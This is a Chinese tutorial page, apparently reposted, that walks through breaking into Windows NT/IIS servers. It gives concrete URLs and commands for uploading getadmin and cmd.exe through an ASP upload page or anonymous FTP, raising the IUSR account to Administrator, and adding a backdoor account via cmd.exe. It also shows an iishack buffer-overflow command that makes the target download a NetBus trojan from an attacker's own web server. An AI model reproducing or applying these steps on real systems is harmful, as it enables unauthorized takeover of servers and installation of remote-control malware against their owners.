当前位置: 首页 > 图文教程 > 服务器 > 安全防护 > 入侵NTserver典型途径攻击基础

安全防护
2003服务器防止海洋木马的安全设置(1)
2003服务器防止海洋木马的安全设置(2)
2003服务器防止海洋木马的安全设置(3)
加固脆弱的IIS服务
linux操作系统的优化及安全配置(1)
linux操作系统的优化及安全配置(2)
linux操作系统的优化及安全配置(3)
Server2003 DNS服务安装篇(2)
Server2003 DNS服务安装篇(3)
Server2003 DNS服务安装篇(4)
WindowsServer2003安全事件ID分析(1)
WindowsServer2003安全事件ID分析(2)
打造安全的Windows 2003系统(5)
Win2003 Server手动设置全攻略(1)
Win2003 Server手动设置全攻略(2)
Win2003 Server手动设置全攻略(3)
Win2003 Server手动设置全攻略(4)
搜索型注入之我看
为Windows 2003安全—层层设防(1)
为Windows 2003安全—层层设防(2)

安全防护 中的 入侵NTserver典型途径攻击基础


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-29   浏览: 72 ::
收藏到网摘: n/a

 

  1. 如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得Administrator权限;
  2. 用netcat和iishack可以获得Administrator;
  3. iusr_计算机名这个帐号有ftp上传、web执行等权限;
  4. 在web server上执行程序是入侵NT的关键;
  5. 要在web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去。
  在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号。

  第一个方法:用iusr_ntsvr2或者guest这两个帐号(这里假设我们已经破解了这个帐号的密码),在浏览器输入:
 http://www.xxx.com/scripts/uploadn.asp
  guest和iusr_ntsvr2这两个帐号都可以进这个asp页面。
  在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录,然后输入:
 http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
  大约十多秒后屏幕显示:
  CGI Error
  这时有90%的可能是你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。
  下面可以add user:
 http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

  这样就创建了一个叫china用户,密码是news,然后:
 http://www.xxx.com/scripts/getadmin.exe?china
  第二个方法:用匿名ftp
  如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT
server,比如:www.xxx.com(示例名):
  c:\> ftp www.xxx.com
  Connected to www.xxx.com
  220 ntsvr2 Microsoft FTP Service (Version 3.0).
  ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain
user组,这个帐号我们以后要用来获取Administrator的权限。
  User (www.xxx.com:(none)):anonymous
  331 Anonymous access allowed, send identity (e-mail name) as password.
  Password: 输入guest@ 或者guest
  对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码,那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain
guest组,在这种情况下我们就可以进NT server的ftp了。
  进去以后,看看目录列表,试试cd /scripts或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握了。
  把winnt下的cmd.exe copy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin,然后输入:
 http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
  大约十多秒后屏幕显示:
  CGI Error
  这时有90%的可能是你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。
  下面可以add user:
 http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20china%20news%20/add

  这样就创建了一个叫china用户,密码是news,然后:
 http://www.xxx.com/cgi-bin/getadmin.exe?china
  或者
 http://www.xxx.com/scripts/tools/getadmin.exe?china
  你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改。如果没有cmd.exe,也可以自己传一个上去到scripts/tools或者cgi-bin目录下。

  第三个方法:用netcat和iishack
  如果你熟悉使用Netcat这个工具,你就知道netcat可以利用NT的弱点在其上绑定端口,下面用的eEye工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大。

 
  IIS的ISAPI的毛病(*.HTR):我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下,有个DLL文件叫ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现。IIShack.asm,利用这个毛病,eEye写了两个程序: iishack.exe、ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和netbus木马传到这个web
server的目录下,比如你的web server是www.mysvr.com,而对方的IIS server是www.xxx.com,则:
  iishack www.xxx.com 80 www.mysvr.com/ncx99.exe (注意:不要加“http://”字符!)
  上述命令输入后这时你应该可以看到:
  ------(IIS 4.0 remote buffer overflow exploit)-----------------
  (c) dark spyrit -- [email protected].
 http://www.eEye.com
  [usage: iishack 〈host〉 〈port〉 〈url〉]
  eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
  do not include http://' before hosts!
  ----